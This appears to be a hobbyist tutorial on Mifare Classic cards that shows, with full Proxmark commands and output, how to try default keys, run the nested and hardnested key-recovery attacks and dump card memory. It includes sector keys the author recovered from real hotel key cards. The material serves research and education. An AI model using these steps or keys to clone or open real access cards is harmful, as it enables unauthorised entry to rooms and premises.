Mifare Classic & NFC
Mifare is a brand of chips for contactless smart cards made by NXP. If you’ve ever had an access card for hotel rooms, a contactless payment card for a canteen or even a modern bus ticket in your hand, you will have used one of the Mifare flavours.
The most simple version is Mifare Ultralight, which is often use in contactless room keys in hotels or for short time use tickets in public transport. Each card has a 512-bit EEPROM which contains:
- UID / Serial Number
- Access control bits managing which parts of the user data may be written / changed
- User data
- A dedicated OTP area
They don’t have any means of protection / encryption except for the optional write protection. As such their read protection is just as good as the protection of a printed piece of paper. Protection here has to be applied on application layer and has to cover the risk of cloning the card.
The version covered on this page is Mifare Classic, which has a very bad history of being hacked, cracked and broken…
Mifare Classic
The mostly used Mifare Classic chips come with 1k of memory, which are split into 16 sectors, with 4 blocks each. Sector 0, Block 0 contains the UID (either 4 byte or 7 byte) and further manufacturer information. Block 3 of each sector can not be used for data (“Sector Trailer”) (except for byte 9), but contains the applicable access keys and access bits. The data sets contains of 6 byte KEY A, 3 byte access bits, 1 byte user data and 6 byte KEY B. It is important to note, that byte 9 of the Sector Trailer may contain user data.
As “containing keys” already implies, Mifare Classic cards offer certain protection for stored data. Depending on the configuration (access bits) these keys are neccessary for reading and writing data on the cards. Also, using the CRYPTO1 algorithm, communication with the card is encrypted.
Tools
Proxmark
The Proxmark is probably the most used tool when doing RFID/NFC research. It consists of a USB reader with a fat firmware and a terminal client, which can be used to control the device. It comes with a large command set for most things one might want to do with contactless cards. It also comes with standalone functionality.
Chameleon Mini
The Chameleon Mini is a NFC card emulator, which can also be used as a read/writer. It runs of a CR2032 coin cell and is aimed at standalone use. It comes with a Windows based UI, which does not make a very stable impression, but does the job.
MiFare Dongles / Cards
When working with NFC one will need various cards and dongles to play with and experiment with. Just get a random set of Mifare Classic cards. I’m currently working with this set from Amazon.
HowTo
Proxmark & Dumping
First you will need to fetch the software necessary for running the Proxmark. Back when I first had a look at it, I was told to stick to the Iceman Fork of the Firmware and have used it since.
It can easily be fetched from GitHub git clone https://github.com/iceman1001/proxmark3.git.
Working with Mifare cards, you need to use the hf command.
pm3 --> hf
help This help
14a { ISO14443A RFIDs... }
14b { ISO14443B RFIDs... }
15 { ISO15693 RFIDs... }
epa { German Identification Card... }
emv { EMV RFIDs... }
felica { ISO18092 / Felica RFIDs... }
legic { LEGIC RFIDs... }
iclass { ICLASS RFIDs... }
mf { MIFARE RFIDs... }
mfu { MIFARE Ultralight RFIDs... }
mfdes { MIFARE Desfire RFIDs... }
topaz { TOPAZ (NFC Type 1) RFIDs... }
list List protocol data in trace buffer
tune Continuously measure HF antenna tuning
search Search for known HF tags [preliminary]
snoop <samples to skip (10000)> <triggers to skip (1)> Generic HF Snoop
Using hf search we can make sure, that the card is actually readable.
pm3 --> hf search
UID : DA 7C A0 10
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Answers to magic commands (GEN 1a): YES
[+] Prng detection: WEAK
[+] Valid ISO14443-A Tag Found
We can then carry on using the hf mf commands. hf mf fchk 1 will use a set of often used and default keys against the card. The 1 is used to use the Mifare Classic 1k mode.
pm3 --> hf mf fchk 1
[+] No key specified, trying default keys
[ 0] ffffffffffff
[ 1] 000000000000
[ 2] a0a1a2a3a4a5
[ 3] b0b1b2b3b4b5
[ 4] c0c1c2c3c4c5
[ 5] d0d1d2d3d4d5
[ 6] aabbccddeeff
[ 7] 1a2b3c4d5e6f
[ 8] 123456789abc
[ 9] 010203040506
[10] 123456abcdef
[11] abcdef123456
[12] 4d3a99c351dd
[13] 1a982c7e459a
[14] d3f7d3f7d3f7
[15] 714c5c886e97
[16] 587ee5f9350f
[17] a0478cc39091
[18] 533cb6c723f6
[19] 8fd0a4f256e9
[+] Running strategy 1
[-] Chunk: 0,4s | found 32/32 keys (20)
[+] Time in checkkeys (fast): 0,4s
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
This is the list of keys neccessary for reading data from the card. I tend to use the d parameter, too. Running hf mf fchk 1 d will create a file called hf-mf-DA7CA010-keys.bin. As you can see, all keys are set to ffff ffff ffff, which are the default factory keys. We can now dump the data from the card using hf mf dump 1. As described in hf mf dump h the 1 is yet again the parameter for 1k cards. By default the command will create a file named after the UID of the card, for us this is hf-mf-DA7CA010-data.bin. When you get a message like #db# Read block error, I’d simply recommend to repeat the dump.
The command results in the following file
00000000: 7a8a 2710 c708 0400 6263 6465 6667 6869 z.'.....bcdefghi
00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000070: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000080: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000b0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000f0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000110: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000120: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000130: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000140: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000150: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000170: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000180: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000190: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001b0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
000001c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001f0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000210: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000220: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000230: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000270: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002b0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002f0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000310: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000320: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000330: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000370: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003b0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003f0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
The dump contains only the vendor information, i.e. the tags serial, and all applicable access bits and keys.
Proxmark & Cracking & Dumping (nested)
Now for a real card: A hotel key card!
Verify the card is Mifare Classic
pm3 --> hf search
UID : 84 06 65 36
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[=] Answers to magic commands: NO
[+] Prng detection: WEAK
[+] Valid ISO14443-A Tag Found
Go for default keys
pm3 --> hf mf fchk 1 d
[+] No key specified, trying default keys
[ 0] ffffffffffff
[ 1] 000000000000
[ 2] a0a1a2a3a4a5
[ 3] b0b1b2b3b4b5
[ 4] c0c1c2c3c4c5
[ 5] d0d1d2d3d4d5
[ 6] aabbccddeeff
[ 7] 1a2b3c4d5e6f
[ 8] 123456789abc
[ 9] 010203040506
[10] 123456abcdef
[11] abcdef123456
[12] 4d3a99c351dd
[13] 1a982c7e459a
[14] d3f7d3f7d3f7
[15] 714c5c886e97
[16] 587ee5f9350f
[17] a0478cc39091
[18] 533cb6c723f6
[19] 8fd0a4f256e9
[+] Running strategy 1
[-] Chunk: 1,9s | found 18/32 keys (20)
[+] Running strategy 2
[-] Chunk: 2,0s | found 18/32 keys (20)
[+] Time in checkkeys (fast): 3,9s
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ------------ | 0 | ffffffffffff | 1 |
|001| ------------ | 0 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ------------ | 0 | ffffffffffff | 1 |
|005| ------------ | 0 | ffffffffffff | 1 |
|006| ------------ | 0 | ffffffffffff | 1 |
|007| ------------ | 0 | ffffffffffff | 1 |
|008| ------------ | 0 | ffffffffffff | 1 |
|009| ------------ | 0 | ffffffffffff | 1 |
|010| ------------ | 0 | ffffffffffff | 1 |
|011| ------------ | 0 | ffffffffffff | 1 |
|012| ------------ | 0 | ffffffffffff | 1 |
|013| ------------ | 0 | ffffffffffff | 1 |
|014| ------------ | 0 | ffffffffffff | 1 |
|015| ------------ | 0 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file ...
Found keys have been dumped to file . 0xffffffffffff has been inserted for unknown keys.
As you can see, we’re missing a fair amount of keys. As such we’ll have to start cracking. As we have a few known keys (the ffffffffffff we found) and the initial read of the card said Prng detection: WEAK we can use the nested attack.
We will use hf mf nested 1 9 A ffffffffffff d. The 1 yet again sets the mode to a 1k card, the 9 A tells the script, we have a known key for block 9 and that it is a A key. The ffffffffffff is the known key. The d stores the extracted keys into a file.
_It is important to note, that you pass a block number here, not a
pm3 --> hf mf nested 1 9 A ffffffffffff d
[+] Testing known keys. Sector count=16
.
[-] Chunk: 2,0s | found 18/32 keys (21)
[+] Time to check 20 known keys: 2 seconds
[+] enter nested attack
[+] target block: 0 key type: A
[+] target block: 4 key type: A
[+] target block: 16 key type: A -- found valid key [6661f36cc44b]
[-] Chunk: 0,4s | found 31/32 keys (1)
[+] target block: 4 key type: A
[+] target block: 4 key type: A
[+] target block: 4 key type: A -- found valid key [2a2c13cc242a]
[-] Chunk: 0,6s | found 19/32 keys (1)
[+] time in nested: 7 seconds
[+] trying to read key B...
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| 6661f36cc44b | 1 | ffffffffffff | 1 |
|001| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| 6661f36cc44b | 1 | ffffffffffff | 1 |
|005| 6661f36cc44b | 1 | ffffffffffff | 1 |
|006| 6661f36cc44b | 1 | ffffffffffff | 1 |
|007| 6661f36cc44b | 1 | ffffffffffff | 1 |
|008| 6661f36cc44b | 1 | ffffffffffff | 1 |
|009| 6661f36cc44b | 1 | ffffffffffff | 1 |
|010| 6661f36cc44b | 1 | ffffffffffff | 1 |
|011| 6661f36cc44b | 1 | ffffffffffff | 1 |
|012| 6661f36cc44b | 1 | ffffffffffff | 1 |
|013| 6661f36cc44b | 1 | ffffffffffff | 1 |
|014| 6661f36cc44b | 1 | ffffffffffff | 1 |
|015| 6661f36cc44b | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
[+] saving keys to binary file hf-mf-84066536-key.bin...
Now we dump the data.
pm3 --> hf mf dump h
Usage: hf mf dump [card memory] k <name> f <name>
[card memory]: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K
k <name> : key filename, if no <name> given, UID will be used as filename
f <name> : data filename, if no <name> given, UID will be used as filename
Examples:
hf mf dump
hf mf dump 4
pm3 --> hf mf dump 1
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
[+] successfully read block 0 of sector 0.
[+] successfully read block 1 of sector 0.
[+] successfully read block 2 of sector 0.
[+] successfully read block 3 of sector 0.
[+] successfully read block 0 of sector 1.
[+] successfully read block 1 of sector 1.
[+] successfully read block 2 of sector 1.
[+] successfully read block 3 of sector 1.
[+] successfully read block 0 of sector 2.
[+] successfully read block 1 of sector 2.
[+] successfully read block 2 of sector 2.
[+] successfully read block 3 of sector 2.
[+] successfully read block 0 of sector 3.
[+] successfully read block 1 of sector 3.
[+] successfully read block 2 of sector 3.
[+] successfully read block 3 of sector 3.
[+] successfully read block 0 of sector 4.
[+] successfully read block 1 of sector 4.
[+] successfully read block 2 of sector 4.
[+] successfully read block 3 of sector 4.
[+] successfully read block 0 of sector 5.
[+] successfully read block 1 of sector 5.
[+] successfully read block 2 of sector 5.
[+] successfully read block 3 of sector 5.
[+] successfully read block 0 of sector 6.
[+] successfully read block 1 of sector 6.
[+] successfully read block 2 of sector 6.
[+] successfully read block 3 of sector 6.
[+] successfully read block 0 of sector 7.
[+] successfully read block 1 of sector 7.
[+] successfully read block 2 of sector 7.
[+] successfully read block 3 of sector 7.
[+] successfully read block 0 of sector 8.
[+] successfully read block 1 of sector 8.
[+] successfully read block 2 of sector 8.
[+] successfully read block 3 of sector 8.
[+] successfully read block 0 of sector 9.
[+] successfully read block 1 of sector 9.
[+] successfully read block 2 of sector 9.
[+] successfully read block 3 of sector 9.
[+] successfully read block 0 of sector 10.
[+] successfully read block 1 of sector 10.
[+] successfully read block 2 of sector 10.
[+] successfully read block 3 of sector 10.
[+] successfully read block 0 of sector 11.
[+] successfully read block 1 of sector 11.
[+] successfully read block 2 of sector 11.
[+] successfully read block 3 of sector 11.
[+] successfully read block 0 of sector 12.
[+] successfully read block 1 of sector 12.
[+] successfully read block 2 of sector 12.
[+] successfully read block 3 of sector 12.
[+] successfully read block 0 of sector 13.
[+] successfully read block 1 of sector 13.
[+] successfully read block 2 of sector 13.
[+] successfully read block 3 of sector 13.
[+] successfully read block 0 of sector 14.
[+] successfully read block 1 of sector 14.
[+] successfully read block 2 of sector 14.
[+] successfully read block 3 of sector 14.
[+] successfully read block 0 of sector 15.
[+] successfully read block 1 of sector 15.
[+] successfully read block 2 of sector 15.
[+] successfully read block 3 of sector 15.
[+] dumped 64 blocks (1024 bytes) to file hf-mf-84066536-data.bin
The result:
00000000: 8406 6536 d108 0400 0199 f9b7 befe 3d1d ..e6..........=.
00000010: bfc0 9956 6469 9683 e52e ff21 f28a df9b ...Vdi.....!....
00000020: 8a00 0400 0100 0000 0000 0000 0000 0000 ................
00000030: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000040: 0000 0000 0000 0000 0000 00c1 0000 00c1 ................
00000050: 0000 0000 0000 0000 0000 00c1 0000 0000 ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000070: 2a2c 13cc 242a ff07 8069 ffff ffff ffff *,..$*...i......
00000080: 02d7 c800 0000 0000 0000 0000 0000 0000 ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000b0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000f0: ffff ffff ffff ff07 8069 ffff ffff ffff .........i......
00000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000110: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000120: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000130: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000140: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000150: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000170: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000180: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000190: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001b0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
000001c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001f0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000210: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000220: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000230: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000270: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002b0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002f0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000310: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000320: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000330: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000370: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003b0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003f0: 6661 f36c c44b ff07 8069 ffff ffff ffff fa.l.K...i......
Proxmark & Cracking & Dumping (hardnested)
When doing hf mf search you’ll sometimes find the line [+] Prng detection: HARD.
pm3 --> hf search
UID : 73 6B 19 DB
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[=] Answers to magic commands: NO
[+] Prng detection: HARD
[+] Valid ISO14443-A Tag Found
This tells you, that it is not vulnerable to the nested attack. Running it will result in an error message as shown below.
pm3 --> hf mf nested 1 9 A ffffffffffff d
[+] Testing known keys. Sector count=16
..
[-] Chunk: 5,1s | found 18/32 keys (21)
[+] Time to check 20 known keys: 5 seconds
[+] enter nested attack
[-] Tag isn't vulnerable to Nested Attack (PRNG is not predictable).
When having this situation you can go for the hardnested attack, which should solve the problem. hf mf hardnested 9 A ffffffffffff 4 A will do the job. hf mf fchk gave us an A key for block 9, which was ffffffffffff and we want to attack the Akey for block 4.
pm3 --> hf mf hardnested 9 A ffffffffffff 4 A
--target block no: 4, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 8 threads and AVX2 SIMD core | |
0 | 0 | Brute force benchmark: 1091 million (2^30,0) keys/s | 140737488355328 | 36h
1 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 36h
4 | 112 | Apply bit flip properties | 147390365696 | 2min
5 | 224 | Apply bit flip properties | 43779555328 | 40s
6 | 336 | Apply bit flip properties | 21652844544 | 20s
7 | 448 | Apply bit flip properties | 19419289600 | 18s
8 | 558 | Apply bit flip properties | 19367587840 | 18s
9 | 670 | Apply bit flip properties | 18187343872 | 17s
9 | 780 | Apply bit flip properties | 18187343872 | 17s
10 | 891 | Apply bit flip properties | 18187343872 | 17s
10 | 1002 | Apply bit flip properties | 18187343872 | 17s
11 | 1112 | Apply bit flip properties | 18187343872 | 17s
12 | 1224 | Apply bit flip properties | 18187343872 | 17s
13 | 1334 | Apply bit flip properties | 18187343872 | 17s
14 | 1443 | Apply bit flip properties | 18187343872 | 17s
15 | 1553 | Apply bit flip properties | 18187343872 | 17s
17 | 1661 | Apply Sum property. Sum(a0) = 96 | 3629149440 | 3s
17 | 1770 | Apply bit flip properties | 3629149440 | 3s
18 | 1881 | Apply bit flip properties | 3629149440 | 3s
18 | 1991 | Apply bit flip properties | 3629149440 | 3s
19 | 1991 | (Ignoring Sum(a8) properties) | 3629149440 | 3s
31 | 1991 | Brute force phase completed. Key found: 2a2c13cc242a | 0 | 0s
So we found they key 2a2c13cc242a. We’ll now pass this back to fchk.
pm3 --> hf mf fchk 1 2a2c13cc242a d
[ 0] key 2A 2C 13 CC 24 2A
[+] Running strategy 1
[-] Chunk: 0,5s | found 30/32 keys (1)
[+] Running strategy 2
[-] Chunk: 0,5s | found 32/32 keys (1)
[+] Time in checkkeys (fast): 0,9s
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|001| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|002| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|005| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|006| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|007| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|008| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|009| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|010| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|011| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|012| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|013| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|014| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|015| 2a2c13cc242a | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file ...
Found keys have been dumped to file . 0xffffffffffff has been inserted for unknown keys.
And luckily this was the only key we needed to find.
Working with -key.bin Files
When doing manual work on the -key.bin files, it is critical to note, that it starts with all A keys, followed by all B keys.
xxd hf-mf-84066536-key.bin
00000000: 6661 f36c c44b 2a2c 13cc 242a ffff ffff fa.l.K*,..$*....
00000010: ffff ffff ffff ffff 6661 f36c c44b 6661 ........fa.l.Kfa
00000020: f36c c44b 6661 f36c c44b 6661 f36c c44b .l.Kfa.l.Kfa.l.K
00000030: 6661 f36c c44b 6661 f36c c44b 6661 f36c fa.l.Kfa.l.Kfa.l
00000040: c44b 6661 f36c c44b 6661 f36c c44b 6661 .Kfa.l.Kfa.l.Kfa
00000050: f36c c44b 6661 f36c c44b 6661 f36c c44b .l.Kfa.l.Kfa.l.K
00000060: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
This is the key file created in the nested example.
Random Notes
You might have noticed, that both examples used the key 2a2c13cc242a. This was actually a complete accident! The first card (nested attack) came from an hotel in San Francisco (big chain), the second one (hardnested) came from an Hotel in Waikiki (single hotel). A very rough guess, but I guess the access control systems might just be from the same vendor.
Shortcuts
Dumping a Card with default keys
hf mf fchk 1 d
hf mf dump 1
Dumping a Card and Cracking Using Nested Attack
hf mf fchk 1 d
hf mf nested 1 X Y zzzzzzzzzzzz d
hf mf dump 1
- Replace the X with a block for which you have a key.
- Replace the Y with an
AorBdepending on the type of key you have. - Replace zzzzzzzzzzzz with the known key. This will often just be
ffffffffffff.